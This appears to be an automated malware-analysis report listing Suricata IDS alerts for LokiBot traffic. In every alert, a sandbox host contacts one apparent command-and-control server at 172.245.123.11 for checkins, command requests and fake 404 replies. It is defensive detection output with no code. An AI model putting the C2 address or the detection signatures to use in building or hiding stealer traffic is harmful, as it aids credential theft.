Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49815 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49815 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 172.245.123.11:80 -> 192.168.2.5:49810
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49790 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49784 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49790 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49784 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 172.245.123.11:80 -> 192.168.2.5:49883
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49784 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 172.245.123.11:80 -> 192.168.2.5:49795
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49784 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49784 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 172.245.123.11:80 -> 192.168.2.5:49821
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49839 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49839 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49920 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49920 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49920 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 172.245.123.11:80 -> 192.168.2.5:49727
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49926 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49926 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49926 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 172.245.123.11:80 -> 192.168.2.5:49889
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49920 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 172.245.123.11:80 -> 192.168.2.5:49719
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49926 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 172.245.123.11:80 -> 192.168.2.5:49710
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49920 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 172.245.123.11:80 -> 192.168.2.5:49778
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49843 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49926 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49843 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49843 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49915 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49915 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49843 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49721 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 172.245.123.11:80 -> 192.168.2.5:49804
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49721 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49721 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49843 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49721 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49721 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49940 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49940 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 172.245.123.11:80 -> 192.168.2.5:49815
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49934 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49934 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49834 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49940 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 172.245.123.11:80 -> 192.168.2.5:49839
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49849 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49849 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49849 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49940 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49915 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49940 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49834 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49934 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49849 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49849 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 172.245.123.11:80 -> 192.168.2.5:49877
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 172.245.123.11:80 -> 192.168.2.5:49920
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49834 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49934 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49934 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49834 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49834 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49915 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49915 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49730 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49932 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 172.245.123.11:80 -> 192.168.2.5:49721
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 172.245.123.11:80 -> 192.168.2.5:49926
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49932 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49932 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49730 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49932 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49932 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49730 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49895 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49895 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49895 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49754 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49754 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49754 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 172.245.123.11:80 -> 192.168.2.5:49915
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 172.245.123.11:80 -> 192.168.2.5:49843
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49730 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49895 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49754 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49730 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49738 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49971 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49754 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49895 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49738 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49971 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49971 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49971 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49971 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49738 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 172.245.123.11:80 -> 192.168.2.5:49790
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 172.245.123.11:80 -> 192.168.2.5:49932
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49982 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49982 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49982 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49738 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 172.245.123.11:80 -> 192.168.2.5:49940
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49738 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49982 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49982 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49964 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49964 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49964 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49724 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50015 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 172.245.123.11:80 -> 192.168.2.5:49784
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50015 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49964 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49976 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49964 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50015 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50006 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 172.245.123.11:80 -> 192.168.2.5:49754
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49976 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50020 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50015 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 172.245.123.11:80 -> 192.168.2.5:49934
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50020 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49976 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50020 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50015 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50006 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50000 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50009 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50000 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50006 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50000 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 172.245.123.11:80 -> 192.168.2.5:49834
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 172.245.123.11:80 -> 192.168.2.5:49982
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49976 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49976 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50000 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50009 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50000 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49724 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49724 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50006 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50020 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50020 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 172.245.123.11:80 -> 192.168.2.5:50015
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50038 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50038 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50038 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 172.245.123.11:80 -> 192.168.2.5:49738
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50038 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49724 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49724 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50006 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49865 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49865 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49865 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50038 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49987 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49865 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49865 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49987 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49987 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 172.245.123.11:80 -> 192.168.2.5:49971
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 172.245.123.11:80 -> 192.168.2.5:49895
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 172.245.123.11:80 -> 192.168.2.5:49730
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 172.245.123.11:80 -> 192.168.2.5:49976
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50009 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 172.245.123.11:80 -> 192.168.2.5:49865
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50061 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50061 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50072 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50074 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50077 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50077 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50077 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 172.245.123.11:80 -> 192.168.2.5:49849
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50085 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50085 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50085 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 172.245.123.11:80 -> 192.168.2.5:50020
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49987 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50077 -> 172.245.123.11:80
